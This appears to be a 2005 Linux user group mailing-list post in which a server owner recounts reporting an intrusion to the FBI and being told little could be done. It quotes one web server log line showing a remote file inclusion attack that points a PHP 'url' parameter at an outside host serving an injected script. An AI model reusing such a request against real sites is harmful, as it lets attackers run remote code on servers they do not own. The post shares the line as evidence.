[lug] SUM: Reporting an Intrusion

[Bill Thoen]

Thanks for the advice, everyone, but it looks like you're right. A hack on 
my little machine is not a big deal in terms of national security, but 
here's what the FBI said.

First, the difficulties are that the originating IP appears to be outside
the United States, and also that the limit of actual damages in this case
(time spent in repairing the system) was probably not more than $100.  
Though the FBI agent didn't say so, the message was clearly "don't hold
your breath."

Here's a little sample from the logs if anyone's curious about where this
event came from:

219.83.0.61 - - [12/Sep/2005:10:42:31 -0600] "POST 
/catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx 
HTTP/1.1" 200 9461 
"http://www.gisnet.com/catalog/software/index.php?url=http://mali.sslcatacombnetworking.com/~efi/inject/tclx" 
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

Anyway, they took down my information and told me to preserve the log
information that shows evidence of the intrusion in case anyone wants to
see it later, and also to report it on the www.ic3.gov (Internet Crime
Complaint Center) website. Apparently that's one place where hacking 
information does get centralized, and maybe they'll see a wider pattern 
one day and send a double-O agent to Jakarta to liquidate someone...

So I guess just like trying to fight spam by reporting it, reporting
hacker activity is just about as satisfying. I have a feeling that my
report is going to be filed in that govt. warehouse where they stuffed the
ark in the Indiana Jones movie. 

- Bill Thoen